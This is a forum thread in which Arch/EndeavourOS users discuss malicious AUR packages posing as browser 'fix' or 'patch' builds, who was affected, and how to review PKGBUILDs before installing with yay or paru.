Apparently on the 16th July, malware was discovered on AUR uploaded by a user.
Packages that could be affected?:
libre wolf fix bin
firefox patch bin
zen browser patch bin
see 1 minute clip by David :
Should one remove & reinstall packages?
Thank you 
Did you install one of those packages?
Those are not normal packages that most people would have installed. Note the patch and fix in the package names.
Thanks Dalto, 
i did install the normal librewolf browser, but i thought the malware affected all related packages & dependencies, for firefox, libre & Zenzen for Arch users ? Thank you
No, it only impacts people who installed those specific affected packages from AUR.
Never heard of any of those. Actual AUR versions would be librewolf-bin and zen-browser-bin. There is no firefox-bin. But there is firefox-beta-bin and firefox-esr-bin.
Because they were only there for a short time until they were discovered. The names are obviously suspect though.
100%. Which leads one to realize that anyone running across those apps should have investigated further. Because anyone whoâs ever dealt with Arch and the AUR should know better. At least, IMHO.
I have librewolf-bin installed. It would have never occured to me to look for a seperate patch package at the AUR since the browser is updated all the time.
How did the bad guy lure them in I wonder?
You just create a malicious PKGBUILD and upload it.
And ostensibly they simply relied on the names relations .. not really luring as such.
( Though maybe some enticement to install occurred in some far-off forum or discord server or something that we do not know about. )
One should always read the PKGBUILD .. you can name it anything and have the source be any unrelated thing. Or include any number of additional actions in the recipe.
Or whats probably worse - malicious individuals taking over what was once a trusted PKGBUILD (as has happened in the past).
Always read the PKGBUILD.
Do not rely on autobuilders like Chaotic.
so a user (if such a hypothetical user used yay) was looking for yay -Ss librewolf will get all the returns including fix-patch or whatever it was calledâŚand decide âthat looks like a good librewolf to me.â I.E. it was aimed at first-time librewolf users?
You have that mostly right .. though not necessarily âfirst timeâ .. maybe someone saw it and wanted to try it out instead of their current version.
But to be clear there would be no way for some user to get any of these things automatically.
Well .. maybe if they used something like pamac .. because it parses updates to repos+aur combined and has poor logic while doing so .. which has resulted in repository packages being replaced by AUR variants ⌠so if the PKGBUILD was written in such a way that it had something like librewolf in the Provides line then maybe. But again, normally not. The previous example hinges on the package-manager/aur-helper having serious technical problems.
Dont use pamac. 
Do these (practical and useful) installers like yay have a mode where you could look at the PKBUILD before installing?
I mean when I install something new, letâs take the Spanish Piper TTS voice (an easy one), Iâd go to its AUR page, hit View PKGBUILD and do a quick check, like âOk, is this really the one from huggingface.co?â
But, for instance, when I get something like 126 Haskell updates just because I need Pandoc, I would surely not check them all. (Bad example, I know, because Pandoc is in extraâjust to make the point.)
The general problem here is that even the technically inclined can get overwhelmed by all the new developments (complicated PKGBUILDs, many deps, etc.), or just get lazy, because we learned over years that it âusually just worksâ.
End users (shouldnât use Arch/EOS, okayâŚ) also tend to follow bad AI advice or YouTube videos blindly and just type in whatever they get told, without the wish to learn anything or even care.
âI mean, hey, we have the friendly forums, and people there work day and night for free and will surely help me repair my messed-up system within minutes, right?â (And I get the chance to type in more funny commands without understanding them!)
So yeah, the more popular Linux becomes, the more malicious idiots and script kiddies will find their way in to make life harder for the rest of us.
The only thing that can help is switching on your brains.
That said, the AUR is an invaluable source for great software. Package maintainers and users both put enormous amounts of work into it, just so that we can have life easier and donât have to build & maintain everything ourselves. My pacman -Qm | wc -l is at 36, and I surely donât install anything I donât need (well, except one of those).
But I digress. Back to the original question.
Thank you Dalto
Many do.
Paru shows it to you first by default.
Hmm. That would be my first valid reason to install yet another package manager⌠I normally only use pacman and yay.
I usually try to keep things pretty much âstandardâ, since I have to work on so many different systems.
I like paru better.
But yay has a similar option .. you just need to set/save it.
If you have never configured yay before then you could run something like
yay --editmenu --save
The editmenu option will allow you to view/edit PKGBUILDs ⌠this command will save/create a conf in ~/.config/yay containing default values along with the editmenu option.
You can then also observe and/or edit that conf file at your leisure.
(Other options such as editor may be of interest.)
Yeah, I already have ~/.config/yay/config.json, now set
"editmenu": true,
in it.
Thanks for the hint! (Itâs also in yayâs man page.) Thatâs a good one, it can save me several manual AUR lookups in the browser.
So which one is better - Yay, Pacman, Trizen or Pamac ( or GUI) please?
Youâd have to ask @cscs for that⌠Personally, I usually restrict myself to pacman and yay, because I have to work on a lot of different machines (also owned by other people, canât install paru or others there), and pacman and yay are on almost every Arch-based installation.
I typically use pacman for all Arch things, and yay if I need to access the AUR. There is also eos-update and eos-update --aur, a wrapper around both aforementioned, able to do some EOS-specific things in addition.
My recommendation still is to stay away from GUI-based âsupposed-to-be-easyâ things like pamac, although it might be tempting. If you are a total newbie, you could install pamac for lookup only, but please donât use it to install/update software! The âbasicsâ like pacman, yay and paru are much safer and more robust. They are also quite easy to use, once you have memorized just a few commandline options, like using -Syu (sync, refresh, sysupgrade) when installing software.
there is no âBetterâ however in this case there is a worse (PAMAC)
Personally I suggest sticking to the command line (pacman, paru) However If a More Graphical approach is desired then I recommend Pacseek in the AUR.